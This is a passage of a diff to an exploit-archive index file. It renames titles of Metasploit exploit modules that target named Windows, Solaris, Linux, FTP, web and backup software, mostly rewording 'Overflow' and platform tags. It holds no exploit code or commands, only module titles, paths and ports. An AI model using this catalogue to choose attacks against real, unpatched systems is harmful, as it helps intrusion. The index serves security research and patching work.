Exploit",2010-09-20,Metasploit,multiple,remote,0 16294,platforms/multiple/remote/16294.rb,"Sun Java JRE - getSoundbank file:// URI Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16295,platforms/multiple/remote/16295.rb,"Apple QTJava - toQTPointer() Arbitrary Memory Access",2010-09-20,Metasploit,multiple,remote,0 -16296,platforms/osx/remote/16296.rb,"Apple OS X iTunes 8.1.1 - ITms Overflow",2010-11-11,Metasploit,osx,remote,0 +16296,platforms/osx/remote/16296.rb,"Apple OSX iTunes 8.1.1 - ITms Overflow",2010-11-11,Metasploit,osx,remote,0 16297,platforms/multiple/remote/16297.rb,"Java - Statement.invoke() Trusted Method Chain Exploit",2010-12-15,Metasploit,multiple,remote,0 16298,platforms/multiple/remote/16298.rb,"Sun Java - JRE AWT setDiffICM Buffer Overflow",2010-09-20,Metasploit,multiple,remote,0 16299,platforms/multiple/remote/16299.rb,"Firefox 3.5 - escape() Return Value Memory Corruption",2010-09-20,Metasploit,multiple,remote,0 @@ -14128,14 +14128,14 @@ id,file,description,date,author,platform,type,port 16324,platforms/multiple/remote/16324.rb,"Solaris sadmind - Command Execution",2010-06-22,Metasploit,multiple,remote,0 16325,platforms/solaris/remote/16325.rb,"Sun Solaris sadmind - adm_build_path() Buffer Overflow",2010-07-03,Metasploit,solaris,remote,0 16326,platforms/solaris/remote/16326.rb,"Solaris - ypupdated Command Execution",2010-07-25,Metasploit,solaris,remote,0 -16327,platforms/solaris/remote/16327.rb,"Solaris in.telnetd - TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 +16327,platforms/solaris/remote/16327.rb,"Solaris in.TelnetD - TTYPROMPT Buffer Overflow",2010-06-22,Metasploit,solaris,remote,0 16328,platforms/solaris/remote/16328.rb,"Sun Solaris - Telnet Remote Authentication Bypass",2010-06-22,Metasploit,solaris,remote,0 16329,platforms/solaris/remote/16329.rb,"Samba - lsa_io_trans_names Heap Overflow (Solaris)",2010-04-05,Metasploit,solaris,remote,0 16330,platforms/solaris_sparc/remote/16330.rb,"Samba - trans2open Overflow (Solaris SPARC)",2010-06-21,Metasploit,solaris_sparc,remote,0 -16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow",2010-06-22,Metasploit,windows,remote,0 +16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service - Overflow Exploit",2010-06-22,Metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows - Remote Agent Overflow",2010-07-03,Metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Windows Media Services - ConnectFunnel Stack Buffer Overflow",2010-04-28,Metasploit,windows,remote,0 -16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow",2010-09-20,Metasploit,windows,remote,0 +16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow Exploit",2010-09-20,Metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD 3.0.2 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD - Request Overflow",2010-12-25,Metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 - LPD Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 @@ -14165,14 +14165,14 @@ id,file,description,date,author,platform,type,port 16361,platforms/windows/remote/16361.rb,"Microsoft Windows - Print Spooler Service Impersonation (MS10-061)",2011-02-17,Metasploit,windows,remote,0 16362,platforms/windows/remote/16362.rb,"Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067)",2011-01-21,Metasploit,windows,remote,0 16363,platforms/windows/remote/16363.rb,"Microsoft Windows - SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",2010-07-03,Metasploit,windows,remote,0 -16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow",2010-05-09,Metasploit,windows,remote,0 -16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow",2010-08-30,Metasploit,windows,dos,0 +16364,platforms/windows/remote/16364.rb,"Microsoft RRAS Service - Overflow Exploit",2010-05-09,Metasploit,windows,remote,0 +16365,platforms/windows/dos/16365.rb,"Microsoft Plug and Play Service - Overflow Exploit",2010-08-30,Metasploit,windows,dos,0 16366,platforms/windows/remote/16366.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (SMB)",2010-09-28,Metasploit,windows,remote,0 16367,platforms/windows/remote/16367.rb,"Microsoft Server Service - NetpwPathCanonicalize Overflow",2011-02-17,Metasploit,windows,remote,0 16368,platforms/windows/remote/16368.rb,"Microsoft LSASS Service - DsRolerUpgradeDownlevelServer Overflow",2010-07-03,Metasploit,windows,remote,0 16369,platforms/windows/remote/16369.rb,"Microsoft Services - nwwks.dll (MS06-066)",2010-05-09,Metasploit,windows,remote,0 16370,platforms/windows/remote/16370.rb,"Timbuktu 8.6.6 - PlughNTCommand Named Pipe Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow",2010-07-03,Metasploit,windows,remote,0 +16371,platforms/windows/remote/16371.rb,"Microsoft NetDDE Service - Overflow Exploit",2010-07-03,Metasploit,windows,remote,0 16372,platforms/windows/remote/16372.rb,"Microsoft - Workstation Service NetpManageIPCConnect Overflow",2010-10-05,Metasploit,windows,remote,0 16373,platforms/windows/remote/16373.rb,"Microsoft Services - nwapi32.dll (MS06-066)",2010-08-25,Metasploit,windows,remote,0 16374,platforms/windows/remote/16374.rb,"Microsoft Windows - Authenticated User Code Execution",2010-12-02,Metasploit,windows,remote,0 @@ -14204,9 +14204,9 @@ id,file,description,date,author,platform,type,port 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow",2010-04-30,Metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Overflow",2010-04-30,Metasploit,windows,remote,0 +16403,platforms/windows/remote/16403.rb,"CA BrightStor Agent for Microsoft SQL - Overflow Exploit",2010-04-30,Metasploit,windows,remote,0 16404,platforms/windows/remote/16404.rb,"Computer Associates ARCserve - REPORTREMOTEEXECUTECML Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent - Overflow",2010-06-22,Metasploit,windows,remote,0 +16405,platforms/windows/remote/16405.rb,"CA BrightStor Universal Agent - Overflow Exploit",2010-06-22,Metasploit,windows,remote,0 16406,platforms/windows/remote/16406.rb,"CA BrightStor Discovery Service - Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16407,platforms/windows/remote/16407.rb,"CA BrightStor ARCserve - Tape Engine Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16408,platforms/windows/remote/16408.rb,"CA BrightStor Discovery Service - TCP Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14234,7 +14234,7 @@ id,file,description,date,author,platform,type,port 16430,platforms/windows/remote/16430.rb,"BigAnt Server 2.2 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16431,platforms/windows/remote/16431.rb,"BigAnt Server 2.50 SP1 - Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16432,platforms/windows/remote/16432.rb,"Firebird Relational Database - isc_create_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 -16433,platforms/windows/remote/16433.rb,"Bomberclone 0.11.6 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16433,platforms/windows/remote/16433.rb,"BomberClone 0.11.6 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (1)",2010-09-20,Metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,0 @@ -14247,7 +14247,7 @@ id,file,description,date,author,platform,type,port 16443,platforms/windows/remote/16443.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow",2010-08-25,Metasploit,windows,remote,0 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow (Windows)",2010-10-09,Metasploit,windows,remote,0 +16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Buffer Overflow",2010-10-09,Metasploit,windows,remote,0 16447,platforms/windows/remote/16447.rb,"Borland InterBase - isc_attach_database() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16448,platforms/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow",2010-09-20,Metasploit,windows,remote,0 16449,platforms/windows/remote/16449.rb,"Borland InterBase - SVC_attach() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 @@ -14267,7 +14267,7 @@ id,file,description,date,author,platform,type,port 16463,platforms/windows/remote/16463.rb,"PuTTy.exe 0.53 - Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS - PAM.dll ICQ Parser Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,Metasploit,windows,remote,0 -16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 - Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 +16466,platforms/win_x86/remote/16466.rb,"Arkeia Backup Client Type 77 (Windows/x86) - Overflow",2010-05-09,Metasploit,win_x86,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS - CGI Filename Double Decode Command Execution",2011-01-08,Metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,Metasploit,windows,remote,0 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 - Printer Host Header Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14417,7 +14417,7 @@ id,file,description,date,author,platform,type,port 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - (msvidctl.dll) MPEG-2 Memory Corruption",2010-04-30,Metasploit,windows,local,0 -16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN - NetExtender ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16616,platforms/windows/remote/16616.rb,"SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16617,platforms/windows/local/16617.rb,"VUPlayer - '.m3u' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16619,platforms/windows/local/16619.rb,"Adobe CoolType - SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 @@ -14479,7 +14479,7 @@ id,file,description,date,author,platform,type,port 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - (.DBR) Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow (2)",2011-01-08,Metasploit,windows,local,0 16677,platforms/windows/local/16677.rb,"CA Antivirus Engine - CAB Buffer Overflow",2010-11-11,Metasploit,windows,local,0 -16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) - (Win32) smb:// URI Buffer Overflow",2010-09-20,Metasploit,windows,local,0 +16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) (Windows/x86) - smb:// URI Buffer Overflow",2010-09-20,Metasploit,windows,local,0 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,Metasploit,windows,local,0 16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - .VBP Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 @@ -14494,15 +14494,15 @@ id,file,description,date,author,platform,type,port 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server - URL Processing Overflow",2010-09-20,Metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy - Host Header Overflow",2010-07-12,Metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 - GET Request Overflow",2010-09-20,Metasploit,windows,remote,3128 -16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 - 'secure' Overflow (Windows)",2010-09-20,Metasploit,windows,remote,7787 -16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 beta 5 - Buffer Overflow",2010-09-20,Metasploit,windows,remote,26000 +16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 (Windows) - 'secure' Overflow",2010-09-20,Metasploit,windows,remote,7787 +16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 Beta 5 - Buffer Overflow",2010-09-20,Metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault - getinfo Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow",2010-11-11,Metasploit,windows,remote,80 16698,platforms/windows/remote/16698.rb,"Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 16699,platforms/windows/remote/16699.rb,"Outlook - ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,Metasploit,windows,remote,0 16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,Metasploit,windows,remote,0 -16701,platforms/windows/remote/16701.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Windows)",2010-05-09,Metasploit,windows,remote,3306 +16701,platforms/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow",2010-05-09,Metasploit,windows,remote,3306 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,Metasploit,windows,remote,21 16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server - Input Overflow",2010-10-05,Metasploit,windows,remote,0 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 @@ -14515,7 +14515,7 @@ id,file,description,date,author,platform,type,port 16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow",2010-07-27,Metasploit,windows,remote,0 16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String",2010-06-22,Metasploit,windows,remote,21 16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,Metasploit,windows,remote,0 -16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB - FTP UNLOCK Overflow (Win32)",2010-10-05,Metasploit,windows,remote,2100 +16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows/x86) - FTP UNLOCK Overflow",2010-10-05,Metasploit,windows,remote,2100 16715,platforms/windows/remote/16715.rb,"Serv-U FTPD - MDTM Overflow",2010-09-20,Metasploit,windows,remote,21 16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14532,14 +14532,14 @@ id,file,description,date,author,platform,type,port 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd - LIST Concatenation Overflow",2010-10-05,Metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP - Username Overflow",2010-09-20,Metasploit,windows,remote,0 -16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB - FTP PASS Overflow (Win32)",2010-04-30,Metasploit,win_x86,remote,0 +16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows/x86) - FTP PASS Overflow",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,Metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version - Exploit",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 +16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Windows/x86) Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow",2010-04-30,Metasploit,windows,remote,21 16740,platforms/windows/remote/16740.rb,"Microsoft IIS - FTP Server NLST Response Overflow",2010-11-12,Metasploit,windows,remote,21 16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow",2010-06-22,Metasploit,windows,remote,0 @@ -14550,7 +14550,7 @@ id,file,description,date,author,platform,type,port 16746,platforms/windows/remote/16746.rb,"SentinelLM - UDP Buffer Overflow",2010-05-09,Metasploit,windows,remote,5093 16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service - Path Overflow",2010-05-09,Metasploit,windows,remote,2103 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)",2010-07-25,Metasploit,windows,remote,0 -16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow",2011-01-11,Metasploit,windows,remote,0 +16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit",2011-01-11,Metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow",2010-04-30,Metasploit,win_x86,remote,0 16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite - LDAP protocol Buffer Overflow",2010-02-15,Metasploit,windows,remote,80 @@ -14560,18 +14560,18 @@ id,file,description,date,author,platform,type,port 16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,Metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 - Accept-Language Overflow",2010-09-20,Metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 - WebTools Buffer Overflow",2010-07-16,Metasploit,windows,remote,9999 -16759,platforms/win_x86/remote/16759.rb,"SHTTPD 1.34 - URI-Encoded POST Request Overflow (Win32)",2010-05-09,Metasploit,win_x86,remote,0 +16759,platforms/win_x86/remote/16759.rb,"SHTTPD 1.34 (Windows/x86) - URI-Encoded POST Request Overflow",2010-05-09,Metasploit,win_x86,remote,0 16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,Metasploit,windows,remote,80 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - EXT.dll Buffer Overflow",2010-07-07,Metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow",2010-07-03,Metasploit,windows,remote,80 -16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 - Header Overwrite (Win32)",2010-04-30,Metasploit,win_x86,remote,8000 +16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows/x86) - Header Overwrite",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,8080 16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan - Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow",2010-07-13,Metasploit,windows,remote,8008 -16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,Metasploit,windows,remote,0 +16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow Exploit",2010-10-04,Metasploit,windows,remote,0 16771,platforms/windows/remote/16771.rb,"EasyFTP Server 1.7.0.11 - list.html path Stack Buffer Overflow",2010-08-17,Metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028 @@ -14583,11 +14583,11 @@ id,file,description,date,author,platform,type,port 16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow",2010-05-09,Metasploit,windows,remote,8800 16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow",2010-11-11,Metasploit,cgi,remote,0 16781,platforms/windows/remote/16781.rb,"MailEnable - Authorization Header Buffer Overflow",2010-07-07,Metasploit,windows,remote,0 -16782,platforms/windows/remote/16782.rb,"Apache - (Win32) Chunked Encoding",2010-07-07,Metasploit,windows,remote,0 -16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow",2010-09-20,Metasploit,win_x86,remote,0 +16782,platforms/windows/remote/16782.rb,"Apache (Windows/x86) - (Windows/x86) Chunked Encoding",2010-07-07,Metasploit,windows,remote,0 +16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit",2010-09-20,Metasploit,win_x86,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,Metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration - Buffer Overflow",2010-11-24,Metasploit,windows,remote,80 -16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 - URL Handling Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,7144 +16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows/x86) - URL Handling Buffer Overflow",2010-09-20,Metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,Metasploit,windows,remote,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,cfm,webapps,0 16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute",2010-11-24,Metasploit,multiple,remote,8080 @@ -14610,7 +14610,7 @@ id,file,description,date,author,platform,type,port 16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b - PassThru Buffer Overflow",2010-07-08,Metasploit,windows,remote,0 16807,platforms/windows/remote/16807.rb,"InterSystems Cache - UtilConfigHome.csp Argument Buffer Overflow",2010-07-12,Metasploit,windows,remote,57772 16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 - URL Handling Buffer Overflow",2010-07-12,Metasploit,windows,remote,80 -16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB - HTTP PASS Overflow (Win32)",2010-09-20,Metasploit,win_x86,remote,8080 +16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB (Windows/x86) - HTTP PASS Overflow",2010-09-20,Metasploit,win_x86,remote,8080 16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x - rembo.exe Buffer Overflow",2010-09-20,Metasploit,windows,remote,443 16811,platforms/windows/remote/16811.rb,"TrackerCam - PHP Argument Buffer Overflow",2010-05-09,Metasploit,windows,remote,8090 16812,platforms/windows/remote/16812.rb,"MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 @@ -14626,7 +14626,7 @@ id,file,description,date,author,platform,type,port 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,Metasploit,windows,remote,25 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow",2010-11-14,Metasploit,windows,remote,389 16824,platforms/windows/remote/16824.rb,"IMail LDAP Service - Buffer Overflow",2010-04-30,Metasploit,windows,remote,389 -16825,platforms/windows/remote/16825.rb,"CA CAM - log_security() Stack Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,0 +16825,platforms/windows/remote/16825.rb,"CA CAM (Windows/x86) - log_security() Stack Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Buffer Overflow",2010-05-13,Metasploit,windows,remote,38292 16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 @@ -14649,39 +14649,39 @@ id,file,description,date,author,platform,type,port 16845,platforms/linux/remote/16845.rb,"Poptop - Negative Read Overflow",2010-11-23,Metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAP server - LSUB Buffer Overflow",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow",2010-04-30,Metasploit,linux,remote,0 -16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - 'secure' Overflow (Linux)",2010-09-20,Metasploit,linux,remote,0 -16849,platforms/linux/remote/16849.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Linux)",2010-05-09,Metasploit,linux,remote,0 +16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow",2010-09-20,Metasploit,linux,remote,0 +16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow",2010-05-09,Metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 -16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 -16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 +16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow",2011-01-09,Metasploit,linux,remote,0 +16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow",2011-01-09,Metasploit,linux,remote,0 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String",2010-04-30,Metasploit,linux,remote,0 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point - apply.cgi Buffer Overflow",2010-09-24,Metasploit,hardware,remote,0 -16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 